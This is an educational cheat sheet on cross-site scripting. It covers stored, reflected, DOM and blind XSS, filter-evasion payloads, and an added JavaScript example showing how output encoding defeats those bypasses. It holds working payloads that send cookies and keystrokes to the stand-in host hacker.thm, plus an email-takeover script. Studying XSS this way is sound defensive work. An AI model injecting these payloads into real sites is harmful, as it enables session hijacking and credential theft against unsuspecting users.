
XSS - Cross-Site Scripting

Tags: XSS, Web, JavaScript, Cookie Stealing, OWASP

Injection attack in which a malicious payload is injected into a web page and executed in other users' browsers, potentially giving an attacker access to user, staff, or other sensitive data.

XSS can be leveraged for a wide variety of attacks, resulting in anything from stealing cookies to executing arbitrary code on the server.

Confirm XSS:

<script>alert('XSS');</script>

Payload examples can be found at:

Example Payloads

Session Stealing

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

Key Logger

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

Change Email

<script>user.changeEmail('attacker@hacker.thm');</script>

XSS Types

Stored XSS

XSS where the payload is injected into a web page and stored on the server side, so the malicious code is served to every other user who views that page.

Attack Vectors:

  • Comments on a blog
  • User profile information
  • Website Listings

Reflected XSS

XSS where the payload is reflected only in the response to the request that carried it. Because nothing is stored on the server, the attacker must get a victim to open a link to the crafted page.

Attack Vectors:

  • Parameters in the URL Query String
  • URL File Path

DOM XSS

DOM-based XSS depends on JavaScript executing in the browser rather than on the server: client-side code takes attacker-controlled input and passes it to a dangerous JS function. As with reflected XSS, the attacker delivers a link with the malicious code embedded.

Attack Vectors:

  • eval()

Blind XSS

Blind XSS is where malicious code is presented to other users (as in stored XSS), but the attacker cannot observe where or whether it fires. A callback to an attacker-controlled server is therefore built into the payload to confirm execution.

Filter Evasion

Break Out of Attribute

><script>alert(1);</script>

Close Encapsulating Tag

</textarea><script>alert(1);</script>

Bypass 'script' Filter

If filter removes 'script':

<sscriptcript>alert(1);</sscriptcript>

XSS in Image Tag

/images/cat.jpg" onload="alert(1);
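
The two evasions above come from the same root cause: the application tries to strip bad input instead of encoding output for the context it lands in. The following is an added example, not code from the original post; the function names (naiveScriptFilter, repeatedScriptFilter, encodeHtml, imgTagUnsafe, imgTagSafe) are this example's own, and the two inputs are constructed from the payloads shown above.

```javascript
// Blacklist filter that removes every literal "script" once, as described under
// "Bypass 'script' Filter". A single pass turns <sscriptcript> back into <script>.
function naiveScriptFilter(input) {
  return input.replace(/script/gi, "");
}

// Same filter applied until the output stops changing. This closes the nesting
// trick but is still a blacklist: any tag or event handler not on the list
// (e.g. the onload= in the image example) passes straight through.
function repeatedScriptFilter(input) {
  let prev;
  do {
    prev = input;
    input = input.replace(/script/gi, "");
  } while (input !== prev);
  return input;
}

// Output encoding for HTML text and double-quoted attribute contexts.
// '&' must be encoded first so already-encoded output is not double-encoded.
function encodeHtml(str) {
  return String(str)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Builds an <img> tag from an untrusted path, the situation the
// "XSS in Image Tag" example relies on, with and without encoding.
function imgTagUnsafe(path) {
  return '<img src="' + path + '">';
}
function imgTagSafe(path) {
  return '<img src="' + encodeHtml(path) + '">';
}

// Constructed inputs taken from the payloads listed on this page.
const NESTED_SCRIPT = "<sscriptcript>alert(1);</sscriptcript>";
const IMG_PATH = '/images/cat.jpg" onload="alert(1);';

console.log(naiveScriptFilter(NESTED_SCRIPT));    // <script>alert(1);</script>
console.log(repeatedScriptFilter(NESTED_SCRIPT)); // <>alert(1);</>
console.log(imgTagUnsafe(IMG_PATH));              // attribute closed, onload injected
console.log(imgTagSafe(IMG_PATH));                // quote encoded, stays inside src
```

Encoding is applied at output time per context; the same value would need URL encoding inside a query string or JS string escaping inside a script block.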

Tools

XSS testing is mostly, and best, done manually, but some tools exist with varying degrees of success:

  • xsshunter
  • xsssniper
  • xssstealer
  • garud
  • 0d1n